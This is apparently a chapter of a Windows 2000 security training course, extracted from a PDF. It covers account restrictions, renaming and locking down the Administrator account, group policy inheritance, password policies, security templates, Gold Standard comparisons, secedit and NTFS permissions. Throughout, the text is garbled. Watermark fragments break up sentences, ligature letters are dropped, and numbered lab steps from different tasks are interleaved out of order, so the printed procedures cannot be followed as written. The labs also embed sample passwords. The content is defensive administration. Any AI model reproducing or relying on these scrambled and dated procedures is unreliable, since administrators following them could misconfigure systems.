Once you have created several user accounts, you should look into restricting the hours in which a user may log on successfully. This is one of the most signicant congurations in terms of securing user accounts. If your network is to provide access only during working hours, there is no reason to allow a user account 24x7 access to the network.
In
Restricting Logon Hours
DO
The accounts that exist when a Windows 2000 server is rst installed are the Guest and Administrator accounts. Securing the Guest account should happen right away. The same steps that are used to secure the Guest account in Windows NT 4.0 can be used to secure this account in Windows 2000.
NO
A local user account has the ability to log on to a specic computer and access authorized resources on that computer.
ru ct
The focal point of Windows 2000 is just as it was in Windows NT 4.0the users. Without users being able to access the network, there is no point in having a network. The creation of user accounts is something all Windows administrators must become familiar with, if they are not already.
or
AT
E
253
When conguring Windows 2000 to be a secure operating system, you will have many choices and conguration options. There are several different templates you can implement, as you will see shortly. In addition to the templates as provided by Microsoft, there are other standards created by different organizations for securing the system. One of these standards is the Gold Standard. The Gold Standard was jointly developed by several organizations, including the NSA and NIST. In this section, you will see references to the Gold Standard, and you will use the Gold Standard template to check the security of your system against the recommendations.
iti
on
In Windows 2000, you are provided with a variety of tools and resources for the conguration and management of security optionsfor both individual computers and the network itself. These tools include the Security Template Snap-In, the Security Conguration and Analysis Snap-In, and Secedit.exe. Secedit.exe is a command-line tool that can be used, among other things, for analyzing the security of many computers in a domain.
Unfortunately, with Windows 2000 Server, restricting logon hours can be done only for Domain (AD) users; however, the procedure for doing so is included here for your reference. 1. Open the MMC, and add the Active Directory Users And Computers Snapin.
3. 4. 5. 6.
In the Properties dialog box, select the Account tab, and click Logon Hours. Specify the necessary time and day restrictions. Click OK to close the Logon Hours dialog box.
Expiration Dates for User Accounts
4. 5.
ru ct st
Click OK to close the User Properties and apply the changes.
Configuring Windows 2000 Groups
In
There are two basic group types: a Security group and a Distribution group. The Distribution group is used to manage lists, such as email lists, and will not be detailed in this course. We will focus on Security groups. These groups can contain users and other security groups, so there is quite a bit of exibility in managing the network.
DO
After the machine has become a domain controller (you can do this by running DCPROMO), you will nd that, as the administrator, there are several groups for you to manage. These groups include the Domain Administrators and Domain Users.
NO
As you begin working with Windows 2000, you will most likely want to implement and congure a full Active Directory structure, to gain all the benets afforded by doing so. However, when you rst install a server, it is nothing more than a stand-alone servernot even part of a domain, let alone a domain controller.
DU
PL
For the Account Expires option, select the End Of radio button, and enter the date on which you want the account to expire.
IC
3.
In the Properties dialog box, select the Account tab.
or
AT
2.
Select the Users folder, and double-click a User object that you want to restrict.
Again, in Windows 2000 Server, this restriction is available only for Domain (AD) users. Here is the procedure, for your reference. 1. Open the MMC, and add the Active Directory Users And Computers Snapin.
Ed
In addition to setting restrictive hours for a user account, you can control access to network resources by dening a limit for a user account. In other words, you are creating a user account that will expire.
iti
Click OK to close the User Properties and apply the settings.
on
2.
Select the Users folder, and double-click a User object that you want to restrict.
In Windows NT 4.0, you will recall that groups can be either global or local. In Windows 2000, that concept is expanded. In Windows 2000, the group types are: Computer LocalA machine-specic group used to provide access to resources on the local machine only. It cannot be created on a Domain Controller.
ru ct
Locking Down the Administrator Account

st
This built-in administrator account is a member of the built-in Administrators group. The built-in administrator account cannot be locked out.
In
The chances are extremely high that anyone familiar with the Windows platform also knows these facts. Therefore, the rst priority for youas an administrator should be to change the name of the built-in administrator account to something that does not sound so administrative and associate it with a very strong password.
DO
NO
This account can, during the installation process, be created with a blank password.
The Administrator account has four signicant facts, from a security perspective: The name of the built-in administrator account is Administrator.
DU
PL
These groups are what you will use when controlling access to resources; both allowing and denying permissions based on your security needs. If you are trying to secure the computer, user, and network environments, you will use group policies, as introduced earlier.
or
IC
AT
It is also possible to combine groups together, such as nesting Global groups in Universal groups, if that is required in your situation. There might be a resource you are trying to control access to, and several Global groups might exist that are already congured with the correct users. In this case, a Universal group will work for controlling access across the network. You can also place Universal groups in Domain Local groups and control access to the resource by placing permissions on the Domain Local group.
Ed
UniversalUsed in a multidomain environment where groups of users from different domains have similar resource use and access needs. In order to implement Universal groups, the network must be running in native mode, meaning only Windows 2000 Domain Controllers are being used. This switch is usually made when all Windows NT 4.0 Domain Controllers have been upgraded to Windows 2000.
E
255
iti
GlobalA group that is used to combine users who often have similar use and access requirements for network resources. Global groups can contain members from the domain in which the group was created and can be used to access resources in that domain as well as in other domains.
on
Domain LocalA group that can have members from any domain in the network. These groups are created only on Domain Controllers, and can be used to provide resource access throughout the domain.
You should also prohibit this account from logging on to this computer over the network. This might sound a bit counter-intuitive until you realize that this account will not get locked out, regardless of how strict an account lockout policy you use; for instance, if you implement an account lockout policy that locks out a user account after three bad logon attempts, then all accounts other than the built-in administrator account will obey this policy. Now, in most organizations, important machines, such as le, print, authentication, Web, mail, and ftp servers, are typically housed in physically secure locations. Only network administrators are allowed into these areas. (If this is not the case in your organization, we recommend you start thinking hard about it.) If you can ensure physical security, then the only other way the servers can be attacked is via the network. The most powerful account on a server is the Administrator account. Attacks on an Administrator account can be protected by implementing a lockout policyexcept, of course, the built-in one. Therefore, it is recommended that this account not have the right to log on via the network.
Securing Administrator Account Access

Setup: You are logged on to Windows 2000 as Administrator.
or
DO NO
2. 3. 4.
In the left pane, expand Local Users And Groups, and select the Users folder. In the right pane, right-click the built-in administrator account (called Administrator) and choose Rename. For the new account name. enter scnpXXX, where XXX is your seat number, such as L01 or R02. The last three letters of your computer name should be your seat number. If you are unsure about your computer name, right-click My Computer and choose Properties, then click Network Identication. Your computer name will be listed for you. Or, you can open a command prompt and enter the ipcong /all commandyour host name is your computer name. Right-click the scnpXXX account and choose Set Password. Enter and conrm aA1234! and click OK twice. In the right pane, right-click anywhere and choose New User. For the new account name, enter Administrator to create a new account that looks like it is the built-in administrator account. Enter the password bB5678! and conrm it.
ru ct
5. 6.
In
256
st
7.
8.
9.
10. Uncheck User Must Change Password At Next Logon. 11. Check User Cannot Change Password and Password Never Expires. Click Create, and then click Close to nish creating the new account.
DU
PL
IC
AT
1.
Right-click My Computer, and choose Manage.
Ed
TASK 4C-1
iti
physical security: The measures used to provide physical protection of resources against deliberate and accidental threats.
on
12. Right-click the new account that you just created, and choose Properties. 13. Select the Member Of tab. 14. Select the Users group and click Remove. 15. Click Apply, and then click Close. 16. In the right pane, right-click anywhere and choose New User. 17. For the new account name, enter scnpXXXb, and for the password, enter cC13579! and conrm it. Again, use your seat number in place of the Xs. 18. Uncheck User Must Change Password At Next Logon. 19. Click Create, and then click Close. 20. Right-click the new account that you just created, and choose Properties. 21. Select the Member Of tab.
22. Click the Add button, select the Administrators group, click Add, and click OK. 23. Select the Users group and click Remove. 24. Click Apply, and then click Close.
Ed
T DU PL IC
25. Open the Custom_GPO. If necessary, expand Local Computer Policy, Computer Conguration, Windows Settings, Security Settings, and Local Policies. Select User Rights Assignment. 26. In the Right Pane, locate and double-click the policy Deny Access To This Computer From The Network. 27. Click Add, then while holding down the Ctrl key, select the user accounts scnpXXX and Administrator. Click Add.
29. Double-click the policy Deny Logon Locally.
st
31. Click OK twice.
In
32. Close all windows. Save settings if you are prompted to do so.
DO
30. Click the Add button, select the user account Administrator, and click Add.
NO
28. Click OK twice.
ru ct
or
AT
E
257
iti
on
Testing Administrative Access

You have renamed the built-in administrator account and congured it to be used only at the machine and not over the network. You have also created a dummy Administrator account that cannot log on locally, nor can it be used to access this machine over the network. And, you have created another administrator account. This is the administrator account that you should use on a day-to-day basis, as and when required; not the built-in account. Now, lets test the results of denying network access to this server for the built-in administrator account. We will create a folder and share it. Then we will congure this folders share permissions to allow Read access for the built-in administrator account. Finally, we will test this access from another machine on the network.
TASK 4C-2
1.
Remember, you set a password for Administrator: bB5678!
Testing Administrative Access
Setup: You are logged on to Windows 2000 as Administrator. Log off and try to log back on as Administrator. You should see a message stating that the local policy does not permit this account to log on.
Ed
T DU
st
9.
Enter \\your_computers_IP_address\newtest. You should receive a dialog box prompting you for a username and password.
Remember to include the computer name; for instance, STU-W2K-L01\scnpl01.
In
10. Enter the name and password for the built-in administrator account. Remember, you changed the built-in administrator account to scnpXXX, with a password of aA1234!. 11. If you are prompted for credentials a second time, enter the same information. You should receive a pop-up error message informing you that a logon failure occurred as the user has not been granted the requested logon type at this computer.
258
DO
ru ct
5. 6. 7. 8.
4.
Right-click the new folder, and choose Sharing. Select Share This Folder, and click the Permissions button. Select Everyone and click Remove.
From your neighbors computer, open the Run dialog box. (From the Start menu, choose Run.)
NO
Click the Add button, select the user accounts scnpXXX and scnpXXXb, and click Add. Then click OK three times.
PL
IC
3.
On your boot partition, create a folder called Newtest, and within this folder, create a text le named doc1.txt. Your boot partition is the partition that contains the Windows 2000 OS les.
or
AT
2.
Try to log on with the renamed Administrator account. This time, you should be able to log on successfully.
iti
on
12. Click OK to close the error message. 13. This time, try logging on with the credentials for scnpXXXb. You should be successful. 14. Return to your own computer, and close any open windows.
Group Policies
In the previous section, you were introduced to Group Policy Objects and their creation. In this section, you will delve deeper into the usage of the GPO in securing the network. Two of the issues that must be discussed are the options associated with policy inheritance and overrides.
You can change the order of implementation on this list by simply choosing a GPO and using the Up and Down buttons to reorder the list to suit your needs. However, you might need to have further control than what the Up and Down buttons provide to you.
Ed
T DU PL IC
From the earlier discussion on Group Policy Objects, you should already be aware that the GPOs are implemented in the following order: local GPO, site GPO, domain GPO, and nally OU GPO. You also are aware of the fact that when there are multiple GPOs assigned to an object, the highest GPO on the list takes priority over the rest of the list.
2. 3. 4. 5. 6.
A user policy is applied when a user logs on to the system and is refreshed at default intervals. The local GPO is applied. The site GPO is applied.
The domain GPO is applied. The OU GPO is applied.
st
No Override
One of the methods for you to manage a GPO implementation is through the No Override option. This option is available on any site, domain, or OU GPO. When selected, this option means that none of the policy settings in this GPO can be overridden. In the event that more than one GPO is set to No Override, the highest GPO takes priority.
In
DO
To keep this complexity in mind, remember that it is not uncommon for sites, domains, and OUs to have more than one GPO congured. It is also not uncommon for there to be conicting settings in locations throughout the policies.
ru ct
Policy inheritance is the name for the process of a user or computer inheriting the nal policy conguration from multiple policies, depending on where the object may be in the Active Directory hierarchy and congured GPOs. To track the policies that might be implemented as a user logs on to a computer, use the following list: 1. A computer policy is enabled when the computer is rst turned on, and is refreshed at default intervals.
NO
or
AT
Policy Inheritance
E
259
iti
on
Block Inheritance
In addition to the No Override option, you have another choice for managing policy implementation. The other choice is called Block Policy Inheritance. This option is also available to any site, domain, or OU GPO. When selected, this option means that any policy that is higher will not be inherited, unless they have been designated with the No Override option. Enabling this option ensures that the settings of the current GPO will be implemented and not the policies of a higher priority policy. You must be very careful in the use of the No Override and Block Inheritance options. These choices, used with incomplete planning, can cause serious disruptions to the overall policies that are implemented throughout the organization.
Local Security Policy
Ed
T DU
Each and every Windows 2000 system on the network has what is called a local security policy. The local security policy is the grouping of security congurations that affect the local computer. These security congurations can dene users and groups rights and permissions, along with determining machine specic security settings. In the following tasks, you will congure local security policy settings.
Verifying Password Requirements
or
DO NO
Setup: You are logged on to Windows 2000 as the renamed Administrator account.
In
260
st
ru ct
1. 2. 3. 4. 5. 6. 7. 8. 9.
Open the Computer Management (Local) console. Create three users named poluser1, poluser2, and poluser3.
Leave this console open.
From the Start menu, choose ProgramsAdministrative ToolsLocal Security Policy. Expand Account Policies, and select Password Policy. In the right pane, double-click the Minimum Password Length policy.
Change the value for Password Must Be At Least to 4 characters, and click OK. Leave the Local Security Settings MMC open. Switch to the Computer Management (Local) console.
10. Right-click poluser1, and choose Set Password. 11. Enter 123 as the password, and conrm it.
PL
IC
AT
TASK 4C-3
iti
on
12. Click OK. You should be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (123) does not meet the password policy requirements. 13. Click OK to close the warning, and then set poluser1s password as 1234 as the password. The password should now be accepted. Click OK. 14. Switch to the Local Security Settings MMC.
15. Double-click the Passwords Must Meet Complexity Requirements policy. 16. Change the setting for this policy to Enabled, and click OK. 17. Switch to the Computer Management MMC. 18. Right-click poluser2, and set the password as 1234.
20. Click OK to close the warning, and then try setting the password as a123.
22. Click OK to close the warning, and then try using aA12 as the password. 23. Click OK. This time, the password should be accepted. 24. Click OK, and close all open windows.
or
DO NO
ru ct
Password Recommendations
In order to create a solid password, you should include a combination of alphanumeric characters, provided that the combination includes both upper- and lowercase letters, which will satisfy complexity requirements as stipulated by Microsofts policy designers. Interestingly, if you search for the denition for this policy in Microsofts TechNet, you will be provided information similar to what is shown in Figure 4-8.
In
st
DU
PL
IC
AT
21. Click OK. You should again be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (a123) still does not meet the password policy requirements. Lets try again.
Ed
19. Click OK. You should be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (1234) does not meet the password policy requirements.
E
261
iti
on
Figure 4-8: A TechNet description of password complexity requirements. This means that simply turning this policy on will not force users to use at least a six-character password. You have already proved this. Nor do you have to enter any of the non-alphanumeric characters. You can get away with using upper- and lower-case alphanumeric characters.
Ed
T DU
or
DO NO
Security Templates
262
In
st
ru ct
The prospect of conguring all the options in the GPO can be quite overwhelming at times. To help with dening how the security should be congured for given situations, Microsoft has included security templates that can be used in the Group Policy Editor. These templates are INF les and can be opened with a text editor for viewing. Templates are stored in the %systemroot%\security\templates folder. Templates can be applied to a GPO, and any user or computer that is controlled by that GPO will be affected by the settings in the security template. Each template itself is a set of pre-congured options that are to be used for a given scenario. Microsoft has included a full set of templates designed to cover most of the standard scenarios that can come up. You can use the templates as-is, or modify them to suit your needs. In addition to modifying a template, you can also create new templates from scratch, so that they are fully customized for your situation.
PL
IC
AT
iti
on
Predefined Security Templates

Some of the common security templates that are built into the system are: BASICDC.INFThis template congures default Domain Controller security settings. BASICSV.INFThis template congures default server security settings. BASICWK.INFThis template congures default workstation security settings. COMPATWS.INFThis template congures compatible workstation or server security settings. SECUREWS.INFThis template congures secure workstation security settings.
Common Security Templates
HISEDC.INFThis template congures highly secure Domain Controller security settings.
SETUP SECURITY.INFThis template congures out-of-the-box default security settings.
or
DO NO
ru ct
Another type of precongured template is the Dedicated Domain Controller (DEDICADC.INF). This template is used to secure a machine running as a Domain Controller, as the name implies. The reason you might want to implement this template is that, by default, the security on a DC is designed to allow for legacy applications, so it is not as secure as it could be. If your DC is not required to run any of these programs, it is suggested that the Dedicated DC template be implemented.
In
st
The highly secure templates (HISEC*.INF) are used to secure network communications on Windows 2000 computers. These templates allow for the highest level of protection on traffic sent to and from Windows 2000 machines. As such, these templates require that a computer congured to use a HISEC template can communicate only with other Windows 2000 computers.
The secure templates (SECURE*.INF) congure security settings for the entire system, but not on les, folders, and Registry keys. Those areas are not addressed in these templates due to the default security that is in place for those objects.
DU
The compatible templates (COMPAT*.INF) are often run only in mixed environments, where Windows NT 4.0 machines are present. These templates congure the system so that local Power Users have security settings that are compatible with Windows NT 4.0 users.
PL
IC
As you can see, there are several general security levels in the templates: basic, compatible, secure, and highly secure. The following denes the general purpose and function of each of the security levels. The basic templates (BASIC*.INF) allow for an administrator to reverse an earlier implementation of a security conguration. The basic templates are not designed as a complete reversal of security congurations on a system, however. These templates congure Windows 2000 security settings that are not related to user rights.
Ed
HISECWS.INFThis template congures highly secure workstation security settings.
AT
iti
security level: The combination of a hierarchical classication and a set of non-hierarchical categories that represents the sensitivity of information.
on
263
Analyzing Default Password Settings of Security Templates

Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. 2. 3. 4. 5. Open an empty MMC.
Choose ConsoleAdd/Remove Snap-ins. Add the Security Templates Snap-In.
Ed
T DU
Expand and review the password policies for Basicsv, Hisecdc, and Securedc. Observe the password denitions of each template. Leave the MMC open for the next task.
or
DO NO
In
st
264
ru ct
TASK 4C-5
1. 2.
Custom Security Templates
As you can see from this short example, the templates provide a range of congured settings. In this case, the passwords are managed differently based on situation. In the event that a security template does not quite t your needs, you can modify the settings. If your needs are such that you would need to modify a great deal of the template, it might be easier to simply create a new template altogether.
Creating a Custom Security Template

Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added. If necessary, expand the Security Templates to reveal all of the templates. Right-click the directory location of the templates (such as C:\WINNT\ Security\Templates), and choose New Template.
PL
IC
AT
iti
TASK 4C-4
on
Another predened template is one that is very important in the world today, but is not included with the other precongured templatesthe HISECWEB.INF template. This template is designed to congure an IIS 5.0 machine running the HTTP service. Although it is not in the list of default templates, this template can be found and downloaded for free, directly from Microsoft, at http:// support.microsoft.com/default.aspx?scid=kb;en-us;Q316347&, which is the URL for the Microsoft article IIS 5: HiSecWeb Potential Risks and the IIS Lockdown Tool (Q316347). The implementation of the HISECWEB.INF template is a requirement for any IIS 5.0 Web server that you need to have locked down.
3. 4. 5. 6.
Name your template Custom Password Cong. Use the Description Template specifying highly secure passwords. Click OK to create a blank template.
a. b. c. d. e. f. g. 7. 8.
Enforce Password History: 24 Passwords
Maximum Password Age: 20 days (accept the suggested value for Minimum Password Age) Minimum Password Age: 5 days Minimum Password Length: 14 characters Account Lockout Threshold: 3 invalid logon attempts Reset Account Lockout Counter After: 120 minutes Account Lockout Duration: 0 minutes (accept the suggested settings)
Right-click the new template, and choose Save. Leave the MMC open for the next task.
or
DO NO
ru ct
This tool takes the security settings of a template and compares the settings to the current conguration of the operating system. During this analysis, it will differentiate between those items that are in compliance and those items that are not in compliance. Items that are in compliance with the settings are highlighted with a green check mark, and items that are not in compliance are highlighted with a red X.
In
st
DU
Another of the advances in security management provided by Windows 2000 is the Security Conguration and Analysis Snap-In of the MMC. With this tool, you can implement templates and congure the security of your system. In addition to implementation, this tool allows for a complete security analysis of the operating system.
PL
IC
Once you have created a policy, or made some changes to a predened template, you will likely want to apply this template to the network. As mentioned earlier, templates can be applied (or imported) to GPOs. Importing a template to a GPO is a straightforward procedure and uses a tool called Security Conguration and Analysis Snap-In.
AT
E
265
Security Configuration and Analysis Snap-In
Ed
iti
on
Congure your template to use the following settings:
TASK 4C-6
Investigating the Security Configuration and Analysis Snap-In
1. 2. 3. 4. 5.
Add the Security Conguration and Analysis Snap-In to the MMC.
For the Filename, enter Password_Check.sdb, and click Open. Because there is no New option, this step creates the new le.
Right-click the Security Conguration and Analysis Snap-In and choose Analyze Computer Now. Accept the default path for error log messages, and click OK. Once the analysis is nished, expand the Security Conguration and Analysis Snap-In, and examine whether or not your system is up to policy in regards to passwords.
Ed
T DU
From the template list, select your Custom Password Cong template, and click Open.
6.
st
266
In
DO
ru ct
Template Implementation
Once you have a conguration you are ready to implement, you can do so by using the Security Conguration and Analysis tool as well. Be aware that when making changes such as a template implementation, this can take a bit of time. However, the process of template implementation is quite straightforward.
Group policies that have been implemented for domain controllers will get refreshed every ve minutes.
NO
There are two general timers associated with policy implementation. By default: Group policies that have been implemented for computers will get refreshed every 90 minutes.
PL
IC
7.
Leave the MMC and snap-in open for the next task.
or
AT
iti
Right-click the Security Conguration and Analysis Snap-In and choose Open Database.
on
Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added.
TASK 4C-7
Implementing the Template
1. 2.
Right-click the Security Conguration and Analysis Snap-In, and choose Congure Computer Now.
3. 4.
Run the analysis again to conrm the conguration has taken place. Close the MMC without saving changes.
The secedit.exe Utility
ru ct
TASK 4C-8
st
1.
Open a command prompt and enter secedit /export /CFG C:\secle.txt to run the secedit.exe tool, indicating that the output should be placed in the secle.txt le.
DO
NO
Analyzing the Current Security Settings of the Local System
DU
Make sure that you include a space before each forward slash (/).
2. 3.
In
Allow the command to complete running. Open the Secle.txt document with Notepad.
PL
Secedit.exe is a command-line tool that can be used to create and apply security templates and can analyze system security congurations. This can be a useful alternative to the GUI tools for checking multiple computers or for scheduling analysis sessions. You could use secedit.exe to analyze all your servers every Friday night, for example.
or
IC
AT
Although the graphical tools are excellent methods of implementation and analysis, there are some command-line functions that can also be used to increase the security of the local machine and the network. Specically discussed in this section is the tool secedit.exe.
Ed
E
267
iti
Keep the default location for error logs, and click OK. It will take several minutes to apply the template. There will be no message on-screen once it has been implemented; you will be at the MMC.
on
Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added, as well as the Security Conguration and Analysis snap-in.
4. 5.
Observe the current security settings, including the Password and Auditing Settings. Close Notepad and the command prompt.
Comparing Windows Defaults to the Gold Standard (2 slides)
Maximum Password AgeThis policy determines how long a user can use the same password before being forced to change it. The Windows default is 42 days; the Gold Standard recommendation is 90 days. Minimum Password AgeThis policy determines how long a user must use a password before being able to change it. This option is there to prevent users from cycling through a list of passwords in quick succession so that they can go back to their favorite password. The Windows default is 0 days; the Gold Standard recommendation is 1 day.
Ed
T DU
The six password policies, along with the Windows defaults and the Gold Standard recommendations, are: Enforce Password HistoryThis policy determines how many unique changes to a password a user can come up with before being able to reuse one. The Windows default is 0; the Gold Standard recommendation is 24.
or
DO NO
268
In
st
ru ct

Passwords Must Meet Complexity RequirementsThis policy determines what combination of characters should be used in a password. The Windows default is Disabled; in the Gold Standard, it is Enabled. Store Password Using Reversible Encryption For All Users In The DomainThis policy takes a bit of explaining. Even though it is a highsounding policy, in essence, if you enable this option, passwords will be stored as plaintext. Seems a bit silly in this day and age to do something like that, doesnt it? So why have this option at all? Well, there are certain applications that use protocols that require knowledge of a users password in order to carry out specic authentication functions, such as when using CHAP authentication through RADIUSin such cases, the system needs the plaintext password to generate a digest. The default is Disabled, the Gold Standard is also to leave it Disabled. In fact, it is recommended to NEVER enable this option unless absolutely required and you know what you are doing, and are aware of the consequences.
PL
Minimum Password LengthThis policy determines how many characters there should be in a password. The Windows default is 0; the Gold Standard recommendation is 8.
IC
AT
iti
In order to enforce a strong password culture in your organization, you have to turn on appropriate variables in more than one policy settingthat is, you might have to tinker with all of the policies under Security Settings, Account Policies, Password Policy. In fact, to tighten up the machine, you have to implement changes to many other policies. You can do this manually, or you can congure security policies to certain standards recommended by people or organizations who have studied these options well, such as the Gold Standard from NIST.
on
Analyzing and Implementing the Gold Standard
TASK 4C-9
Configuring Policies to the Gold Standard
1. 2. 3. 4. 5. 6. 7. 8. 9.
From Administrative Tools, open the Local Security Policy. Expand Account Policies, and select Password Policy. In the right pane, verify that the Enforce Password History policy is set to Keep Password History For 24 Passwords Remembered. Double-click the Maximum Password Age policy.
Change the value for Passwords Expire In to 90 days, and click OK. Double-click the Minimum Password Age policy.
Change the value to Password Can Be Changed After 1 day, and click OK. Double-click the Minimum Password Length policy.
Ed
T DU PL IC
10. Observe the Passwords Must Meet Complexity Requirements policy. You have already enabled this policy, so you can skip it here. 11. Observe the Store Password Using Reversible Encryption For All Users In The Domain policy. This policy should remain disabled, so you can skip this, too. 12. Close all open windows.
Analyzing the Gold Standard
st
As an administrator, you may or may not agree with the settings provided to you in a template. Some template settings may be too strict, while others may be too lax. It is up to you to decide that. The Gold Standard is only a recommendation for a secure desktop environment. It may or may not work for your organization.
In
Instead of conguring each policy one at a time, such as you did in the previous task, there is a template for meeting the Gold Standard provided on the data disk for you to use. The name of the le is NIST2kws.inf.
DO
You now have set the appropriate values for the password policies to meet the NSA/NISTs Gold Standard. Of course, this does not mean that your machine is now operating at Gold Standard levels. There are nearly a hundred such policies and many other Registry entries that can be congured with the template for the Gold Standard.
ru ct
NO
or
AT
Change the value for Password Must Be At Least to 8 characters, and click OK.
E
269
iti
on
If you want, you can tinker with the settings and create your own template. Once you are satised with a template, you can congure the computer to match these settings. In a domain environment, remember that you also have the advantage of implementing group policies for the entire domain or an OU within a domain.
TASK 4C-10
Analyzing the Gold Standard
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. 2. 3. 4. Copy the Gold Standard template le NIST2kws.inf from your data disk to your WINNT\security\templates folder. Start the MMC, and add the Security Conguration And Analysis snapin. In the left pane, select Security Conguration And Analysis. Read the instructions displayed in the right pane. Because we do not have an existing database, we will follow the instructions to create a new database.
Ed
T DU
st
11. When the analysis is complete, observe the security areas listed below the main scope. 12. Expand Account Policies, and select Password Policy. In the right pane, you should see three columns of information. The rst column is the policy, the second column is the setting as specied in the template (which, in this case, is NISTs Gold Standard), and the third column shows your computers present setting.
270
In
DO
ru ct
8. 9.
Again, read the instructions displayed in the right pane. We do not want to congure the computer. We only want to analyze our computers security settings against this template. Right-click Security Conguration And Analysis, and choose Analyze Computer Now.
10. Accept the location of the error log le path, and wait a few seconds for the analysis to proceed. Your computers security settings are being compared to the settings in the Gold Standard template.
NO
PL
7.
In the Import Template dialog box, select the NIST2kws.inf template and click Open.
IC
6.
Name the new database goldpol, and click Open.
or
AT
5.
Right-click Security Conguration And Analysis, and choose Open Database.
iti
on
13. On each policy in the rst column, verify that you see a green check mark. This means that your computers setting for that policy matches the template its being compared against. In the case of the password policies, you have already taken care of each setting manually to comply with the Gold Standard; therefore, all six policies listed here have a green check mark. 14. In the left pane, select Account Lockout Policy.
15. Observe the right pane. One of the policiesAccount Lockout Thresholdhas a green check mark, while the other two policies show a red X, signifying that the computers setting is different from the template. 16. In the left pane, expand Local Policies.
17. Select Audit Policy, User Rights Assignment, and Security Options. In each case, observe the various policies in the right pane that are not consistent with the template. 18. In the left pane, select Restricted Groups.
19. Observe the right pane. Only one groupthe Power Users grouphas a green check mark. When an item has neither a green check mark nor a red X, this means that this item was not included in the template to be compared with.
Ed
T DU PL IC
21. In the left pane, select System Services, and observe the number of inconsistencies displayed in the right pane. 22. Double-click any inconsistent setting and any consistent setting, and compare the two settings.
23. In the left pane, select Registry, and observe the number of inconsistencies displayed in the right pane. 24. Double-click any inconsistent setting and any consistent setting, and compare the two settings. 25. In the left pane, select File System, and observe the number of inconsistencies displayed in the right pane.
st
26. Double-click any inconsistent setting and any consistent setting, and compare the two settings.
In
27. Close all open windows without saving any changes.
DO
ru ct
NO
or
AT
20. Double-click the Power Users group. Observe that, according to the template, this group should have no members within it, nor should this group be nested within some other group. Click Cancel.
E
271
iti
on
Topic 4D
Windows 2000 Resource Security
File and Folder Security
or
DO NO
ru ct
Just as a newly created partition has default security settings, so does the installed operating system. In Windows 2000, some additional measures have been added to prevent users from changing the system les of Windows itself. Those changes are to hide the folders in the \Winnt folder and the \System32 folder by default; however, a quick click the Show Files option and all is revealed to you. There is a built-in mechanism that is working to your advantage to keep system les from being modied. It is called the Windows File Protection (WFP) system, and its job is to ensure that system les installed during the setup of Windows are not deleted or overwritten. Only les that have been digitally signed by Microsoft will be able to make these changes. Youll notice this when installing, say, a Microsoft-approved device driver.
File and Folder Permissions

The process for viewing permissions is the same in Windows 2000 as it was on Windows NT 4.0. To view the permissions for an object, right-click the object, choose Properties, and view the information on the Security tab. More detailed data is provided on the Advanced tab. File permissions are different in Windows 2000 than they were in Windows NT 4.0. Some of the le permissions available are dened in the following list: Traverse Folder/Execute FileThe Traverse Folder permission applies only to folders and manages a users ability to move through a folder to reach
In
st
DU
PL
IC
Any new partition either created or converted to NTFS will, by default, allow the Everyone group Full Control access. You will soon begin to see some signicant changes in this regard with the Windows Server 2003 (.NET) servers, though. Because this group includes the Guest and Anonymous accounts, strict security must be implemented before you allow any user accounts to access the system or to be added.
Ed
The use of NTFS in Windows 2000, technically called NTFS version 5, is required if an administrator wants to use Active Directory, domains, and the advanced le security that is provided. Additionally, the addition of le encryption and disk quotas require NTFS. It is strongly recommended that all partitions that are still running FAT or FAT32 be converted to NTFS in order to effectively secure Windows 2000 resources. If you need to convert a partition to NTFS, you can use the command convert c: /FS:NTFS, where c is the le partition to be converted.
AT
iti
While Windows NT 4.0 had the ability to work with only FAT and NTFS le systems, Windows 2000 can also work with FAT32. And, even though Windows 2000 can support FAT and FAT32, it is still recommended that NTFS be used for its security options.
on
Many resources are available on a Windows 2000 server and network, all of which need to be secured in some manner. Lets start with the le system.
other les and folders, regardless of the permissions on the folder. The Execute File permission applies only to les and manages a users ability to run program les. List Folder/Read DataThe List Folder permission applies only to folders and manages a users ability to view lenames and folder names. The Read Data permission applies only to les, and manages a users ability to read les.
Create Folders/Append DataThe Create Folders permission applies only to folders, and manages a users ability to create folders within a folder. The Append Data permission applies only to les, and manages a users ability to make changes to the end of a le. DeleteThis permission manages a users ability to delete a le or a folder.
Read PermissionsThis permission manages a users ability to read the permissions of a le or a folder.
Take OwnershipThis permission manages a users ability to take ownership of a le or folder. Read AttributesThis permission manages a users ability to read the attributes of a le or folder.
or
DO NO
ru ct
Figure 4-9: Windows 2000 NTFS folder permissions.
PL
These permissions alone are not considered allowing or denying access; the administrator must dene that for each object. In general, it is not necessary to specify each of these unique permissions when securing resources. You will most likely use the dened permissions of: Full Control, Modify, Read And Execute, List Folder Contents, Read, and Write. The specic abilities of each of these permissions are dened in the chart shown in Figure 4-9.
IC
NTFS Folder Permissions
In
st
T
DU
AT
E
273
Write AttributesThis permission manages a users ability to modify the attributes of a le or folder.
Ed
Change PermissionsThis permission manages a users ability to change the permissions of a le or a folder.
iti
on
As you can see, when you apply the Read permission, for example, to a folder, it gets List Folder / Read Data, Read Attributes, and Read Extended Attributes as the permission to the folder. NTFS le permissions are similar, except that there is no List Folder Contents option, because the permissions are applying to a le. One big difference from Windows NT 4.0 NTFS permissions is the ability to explicitly deny each of these permissions.
Inheritance and Propagation
When you create a new le, this new le will inherit the permissions of its parent folder, or of the parent partition if it is a root-level folder. Therefore, if a parent folder is set for Everyone Modify, the le you create in that folder will have Everyone Modify as its permissions. There is a way that you can alter this behavior so that the permissions do not work in this manner. You can create a folder and apply the permissions to the This Folder Only option, which means that new data created in the folder will not inherit the permissions of the folder. Those new objects will inherit the permissions that are set one level higher. Say you have a folder D:\Secure\One and this folder has had permissions applied to This Folder Only, and you create a le D:\Secure\One\test.txt. This le will inherit its permissions from the D:\Secure object. You can also block the inheritance of permissions by clearing the Allow Inheritable Permissions From Parent To Propagate To This Object option on the Security tab of the Properties windows for an object. When you clear this option, you will be presented with three options: To copy the permissions that this object has inherited.
Ed
T DU
To cancel the operation and keep the permissions as they were.
st
274
In
DO
ru ct
